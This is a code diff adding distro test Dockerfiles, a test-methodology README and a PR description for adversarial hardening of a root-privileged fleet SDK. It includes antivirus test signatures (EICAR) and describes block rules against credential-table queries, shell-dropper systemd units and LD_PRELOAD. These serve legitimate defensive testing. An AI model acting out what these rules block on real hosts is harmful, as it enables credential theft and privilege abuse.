+#   cryptsetup      — sys/encryption LUKS
+#   nftables        — nft (sys/firewall, CAP_NET_ADMIN)
+#   iproute         — ip (sys/netconfig)
+#   util-linux      — lsblk (sys/inventory), runuser + wall (sys/desktop, sys/notify)
+#   shadow-utils    — useradd (sys/terminal, sys/desktop)
+#   gnupg2          — gpg --dearmor (sys/repo dnf keyring)
+#   smartmontools   — smartctl (sys/smart)
+#   openssl         — sys/catrust trust probe (`openssl verify`)
+#   ca-certificates + p11-kit — update-ca-trust (sys/catrust P11Kit backend)
+#   flatpak         — sys/desktop per-user install probe
+RUN dnf -y install --setopt=install_weak_deps=False \
+    psmisc cryptsetup nftables iproute util-linux shadow-utils \
+    gnupg2 smartmontools openssl ca-certificates p11-kit flatpak git \
+    && dnf clean all
+
+WORKDIR /workspace
+COPY sdk/ ./sdk/
+RUN printf 'go 1.25.11\n\nuse (\n\t./sdk\n)\n' > go.work
+RUN cd sdk && go mod download
+
+# --- bad-state stages -------------------------------------------------------
+
+# with-clamav: the real ClamAV scanner + the SAME static seed signature DB as the
+# Debian image (EICAR by md5 in .hdb; our marker byte-pattern in .ndb) so clamscan
+# detects deterministically with no ~300 MB freshclam download. freshclam.conf is
+# removed (Fedora ships it at /etc/freshclam.conf) so UpdateSignatures fails fast.
+FROM base AS with-clamav
+RUN dnf -y install --setopt=install_weak_deps=False clamav \
+    && dnf clean all \
+    && rm -f /var/lib/clamav/*.cvd /var/lib/clamav/*.cld /var/lib/clamav/*.cud \
+    && mkdir -p /var/lib/clamav \
+    && printf '44d88612fea8a8f36de82e1278abb02f:68:PM.Eicar.Test\n' \
+       > /var/lib/clamav/pm-seed.hdb \
+    && printf 'PM.Marker.Test:0:*:504d2d434c414d41562d544553542d4d41524b4552\n' \
+       > /var/lib/clamav/pm-seed.ndb \
+    && rm -f /etc/freshclam.conf \
+    && clamscan --version \
+       || (echo "PRECONDITION FAILED: clamscan not installed/runnable" && exit 1)

--- a/test/Dockerfile.opensuse
+++ b/test/Dockerfile.opensuse
@@ -1,0 +1,44 @@
+# Container-based real-execution test image for the SDK (openSUSE / zypper family).
+#
+# openSUSE/SLES is its own trust-store and login.defs world: it ships
+# update-ca-certificates (same NAME as Debian's) but reads /etc/pki/trust/anchors,
+# and its login.defs resets PATH inside runuser. Running the matrix here is what
+# surfaced both — sys/catrust uses the SuseCaCertificates backend and sys/desktop
+# exercises the env-PATH-wrapper fix.
+#
+# No with-osquery stage: osquery is not packaged for openSUSE.
+FROM golang:1.26-bookworm AS go
+
+FROM opensuse/leap:latest AS base
+COPY --from=go /usr/local/go /usr/local/go
+ENV PATH="/usr/local/go/bin:${PATH}"
+ENV GOTOOLCHAIN=local
+
+# See Dockerfile.fedora for the per-tool capability mapping. On openSUSE lsblk and
+# wall live in util-linux-systemd (not the base util-linux), and update-ca-certificates
+# comes from ca-certificates (the SUSE trust flow → SuseCaCertificates backend).
+RUN zypper --non-interactive --gpg-auto-import-keys refresh \
+    && zypper --non-interactive install --no-recommends \
+    psmisc cryptsetup nftables iproute2 util-linux util-linux-systemd shadow \
+    gpg2 smartmontools openssl ca-certificates flatpak git \
+    && zypper clean --all
+
+WORKDIR /workspace
+COPY sdk/ ./sdk/
+RUN printf 'go 1.25.11\n\nuse (\n\t./sdk\n)\n' > go.work
+RUN cd sdk && go mod download
+
+# with-clamav: clamav + the same static seed DB. openSUSE ships freshclam.conf at
+# /etc/freshclam.conf.
+FROM base AS with-clamav
+RUN zypper --non-interactive install --no-recommends clamav \
+    && zypper clean --all \
+    && rm -f /var/lib/clamav/*.cvd /var/lib/clamav/*.cld /var/lib/clamav/*.cud \
+    && mkdir -p /var/lib/clamav \
+    && printf '44d88612fea8a8f36de82e1278abb02f:68:PM.Eicar.Test\n' \
+       > /var/lib/clamav/pm-seed.hdb \
+    && printf 'PM.Marker.Test:0:*:504d2d434c414d41562d544553542d4d41524b4552\n' \
+       > /var/lib/clamav/pm-seed.ndb \
+    && rm -f /etc/freshclam.conf \
+    && clamscan --version \
+       || (echo "PRECONDITION FAILED: clamscan not installed/runnable" && exit 1)

--- a/test/README.md
+++ b/test/README.md
@@ -1,0 +1,100 @@
+# SDK test methodology
+
+The SDK wraps privileged, distro-specific host tooling (package managers, repo
+config, trust stores, systemd, firewall, LUKS, …) and runs it as **root on a
+fleet** with input from a semi-trusted control plane. That threat + portability
+profile — not "it's just CLI arg wrappers" — is what dictates how we test.
+
+## Tiering: test rigor follows risk
+
+Every capability is classified by one discriminator:
+
+> **Does it take untrusted input AND act with privilege?**
+
+| Tier | Profile | Required testing |
+|------|---------|------------------|
+| **A — trust boundary** | untrusted input × privileged (repo, pkg, catrust, service unit content, dns, luks, remote download) | Full rejection coverage (correct / absent / malformed, driven through the real handler) · real-tool container tests · fitness functions (`archtest/`) |
+| **B — privileged, fixed input** | runs as root but args are operator/code-controlled, no untrusted data | Happy-path + idempotency + a couple of rejection tests; **no** adversarial state machine |
+| **C — pure helper** | no privilege, no untrusted input | Ordinary unit tests |
+
+Only Tier-A gets the adversarial state machines (`*security_machine_test.go`,
+`adversary/`) and the Turso-style DST harness (`adversary/dst_test.go`, one
+module-level harness — never replicated per package). This caps the maintenance
+cost and concentrates effort where a bug means root RCE on the fleet.
+
+## Two execution levels (aligned with Ansible/Chef/Puppet)
+
+Config-management tooling (Molecule, Test Kitchen, rspec-puppet) splits the same
+way, and we match it:
+
+1. **Hermetic unit tests** — drive the capability through a `FakeRunner` with
+   scripted tool output. Fast, run everywhere, pin the emitted argv / branch
+   logic / declared intent without touching the host. (≈ ChefSpec / rspec-puppet
+   "the catalog *would* contain X".)
+2. **Real-execution container tests** (`//go:build container`) — run the REAL
+   tool, real filesystem, real `gpg`/`openssl`/`cryptsetup` inside a container.
+   (≈ Test Kitchen / Molecule converge.)
+
+Three disciplines carried over from that ecosystem:
+
+- **Idempotency is first-class** — Apply twice; the second run reports
+  `Changed=false`. Asserted in every Apply/Remove container test.
+- **Verify with an independent probe** — never trust "the tool says it did X";
+  assert the system *is* in state X via a separate checker: `apt-get --print-uris`
+  / `pacman-conf --repo` / `zypper lr` for repos, `openssl verify` for the trust
+  store. (≈ ServerSpec / InSpec / testinfra.)
+- **No vacuous skip** — a container cell asserts its expected tools are present at
+  build/CI time, so a test never silently skips because a tool went missing.
+
+## Distro matrix
+
+Container tests run across the distro families a managed fleet actually runs —
+the "platforms" model (Molecule platforms / Kitchen). Coverage is **empirical**:
+we run every capability on every distro and let the failures define the work,
+rather than predicting from code.
+
+| Capability | Debian | Fedora | EL (Alma/Rocky) | Arch | openSUSE |
+|------------|:--:|:--:|:--:|:--:|:--:|
+| pkg, repo, encryption, firewall, netconfig, terminal, smart, reboot, desktop, inventory | ✅ | ✅ | ✅ | ✅ | ✅ |
+| catrust | ✅ ca-certificates | ✅ p11-kit | ✅ p11-kit | ✅ p11-kit | ✅ suse-ca-certificates |
+| antivirus | ✅ | ✅ | ✅ | ✅ | ✅ |
+| notify (`wall`) | ✅ | ✅ | ✅ | ✅ | ❌¹ |
+| osquery | ✅ | —² | —² | —² | —² |
+
+¹ openSUSE does not package `wall` (`rpm -qf /usr/bin/wall` → absent), so the
+notify broadcast path cannot run there.
+
+² osquery is a single statically-built binary; `osqueryi --json` behaves
+identically on every distro, so it is covered once on Debian (the upstream .deb).
+Its rpm/AUR packaging elsewhere is fragile in CI and buys no behavioural coverage.
+
+These two are the documented matrix gaps; everything else runs on all five families.
+
+Each distro has a `test/Dockerfile.<distro>` (same multi-stage shape; the Go
+toolchain is copied from the canonical `golang` image so the compiler is
+identical everywhere and only the distro userland differs). Adding **Rocky** is a
+one-line copy of `Dockerfile.almalinux` + a matrix entry — they are bug-for-bug
+RHEL rebuilds, so one EL representative covers both.
+
+### Cross-distro findings the matrix surfaced
+
+Running the matrix (rather than scanning code) found real portability gaps that
+debian-only testing hid:
+
+- **catrust**: openSUSE ships `update-ca-certificates` (same name as Debian) but
+  reads `/etc/pki/trust/anchors` → needed a dedicated `SuseCaCertificates` backend
+  and a Detect that disambiguates by anchors dir. It also gave the P11Kit backend
+  its first real coverage (the old debian-only test silently skipped it).
+- **desktop**: openSUSE's `login.defs ALWAYS_SET_PATH` resets PATH inside
+  `runuser`'s PAM session → `RunAsCommand` now re-applies the curated PATH via an
+  `env PATH=…` wrapper that runs after the session is set up.
+- **inventory**: the os-release test hardcoded `ID=="debian"`; generalized to
+  independently read `/etc/os-release` and assert the parser agrees.
+
+## Commands
+
+```bash
+go test ./...                                    # hermetic unit tests
+go test -tags=container -run Container ./sys/... # real-execution (inside a container)
+PM_DST_SEED=1 PM_DST_ITERS=20000 go test ./adversary/ -run TestDST   # DST sweep
+```


### PR DESCRIPTION
## Summary

Adversarial test-hardening pass on the SDK, plus the three remaining SDK capability
gaps and a real-tool repository security matrix. One PR, as requested.

This branch started from a large suite of **red** adversarial state-machine tests
(an attacker trying to turn each capability into a privileged primitive). Every red
test is made green by **hardening production code** — no test was weakened to pass.

### 1. Adversarial hardening (15 packages + cross-cutting machines)

Per-package `security_machine_test.go` + top-level `adversary/` machines model an
adversary against the argv/secret/trust boundary. Fixes driven by the red tests:

- **remote**: reject extract+prune without an integrity checksum, negative MaxBytes,
  setuid/setgid/sticky mode bits; refuse cross-host redirects; propagate `crypto/rand`
  failure instead of discarding it.
- **exec**: shared `ValidateCommandEnv` gate, also enforced by the `FakeRunner` so a
  test can't smuggle an unvalidated env past the boundary.
- **osquery**: `RawSql` is now gated against the credential-table deny-list (closes the
  WS4 escape hatch — operator decision to gate).
- **network**: WPA-PSK validator (8–63 / 64-hex / printable), connection-name
  revalidation; PSK never reaches argv (keyfile-only, `Reveal()` allowlisted).
- **dns (NetworkManager)**: roll back the staged DNS mutation when `connection up`
  fails after the modify, so a failed apply leaves no residual resolver; host-output
  (connection name) revalidated before any escalated mutation.
- **firewall / desktop / service**: reject a fully-unconstrained allow rule; validate
  `runas` extra-env through the shared exec gate; **systemd unit-content policy**
  (no shell-dropper `Exec*`, no world-writable exec/EnvironmentFile, no LD_PRELOAD env).

### 2. Turso-style Deterministic Simulation Testing (`adversary/dst_test.go`)

A seeded, reproducible engine drives thousands of randomized capability operations
with adversarially-generated operands and asserts global invariants on every recorded
command — I1 no control char in argv, I2 a flag-shaped operand is rejected or appears
only after `--`, I3 a secret's plaintext never reaches argv — plus a fault-injection
pass feeding hostile host output back into a read→mutate path. Seed/iters overridable
(`PM_DST_SEED` / `PM_DST_ITERS`); a failure replays deterministically. Matches-zero
guards prevent a vacuous (everything-rejected) pass.

### 3. SDK capability gaps

- **`pkg.LocalPackageInfo(ctx, path)`** per backend (apt/dnf/zypper/pacman/flatpak),
  with untrusted-name + local-path validation.
- **`user.LastLogin(ctx, name)`**.
- **`Repair` completion**: dnf `rpm --rebuilddb`, pacman keyring init/populate.

(Reported gaps #1 flatpak Pin/Unpin and #4 mount RemountRW were already present on
`main` — the report was stale; verified, not re-implemented.)

### 4. Repository security container matrix (`sys/repo/repo_security_container_test.go`)

Package `repo` is a supply-chain trust boundary; its container coverage was
happy-path only. New **real-tool** tests drive the trust controls through actual
apt/dnf/pacman/zypper, real `gpg --dearmor`, and the real fd-anchored `fs.Manager`:

- apt malformed-key fail-closed (no partial write); **conflict cleanup confined to the
  keyring jail** (out-of-jail `Signed-By` target preserved, in-jail decoy removed);
  key rotation; a rejected re-Apply leaves the existing repo byte-for-byte intact.
- dnf `gpgcheck=0` drops the `gpgkey=` line and skips `rpm --import` (no silent trust).
- pacman `SigLevel Never` rejected before any write; reserved name `options` rejected.
- **operator-override pins** (apt `Trusted: yes`, dnf `gpgcheck=0`, zypper
  `--no-gpgcheck`, pacman `TrustAll`) assert these documented operator choices stay
  **allowed** — a future change that silently rejects them is a visible decision, not a
  regression. (Consistent with the 2026-06 operator-choice policy; signature-disabling
  `Never` is the one downgrade that is refused.)

Happy-path dnf/pacman/zypper container tests now use signed/gpg-checked configs so the
secure path is the modelled default. All new tests are `Detect`-gated, run via the
existing `-run Container` CI lanes (debian/fedora/arch/leap), and stay hermetic.

## Verification

- Whole module `go test -race ./...`, `staticcheck`, `go vet`, `gofmt` — clean.
- `archtest` fitness functions (reveal-sink allowlist, crypto/rand entropy) — pass.
- DST: 8 seeds × 20k iters (160k ops) — pass.
- **Repo-security container tests run for real** in debian/fedora/arch/opensuse
  containers (all 11 security tests + the 3 secured happy-paths) — all green.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added ability to read package metadata directly from local package files without installation
  * Added user account login time retrieval

* **Improvements**
  * Extended input validation across package managers, DNS configuration, file operations, and notifications
  * Added automatic DNS rollback when network configuration fails
  * Strengthened HTTP redirect policies and configuration validation
  * Enhanced certificate trust anchor validation

<!-- end of auto-generated comment: release notes by coderabbit.ai -->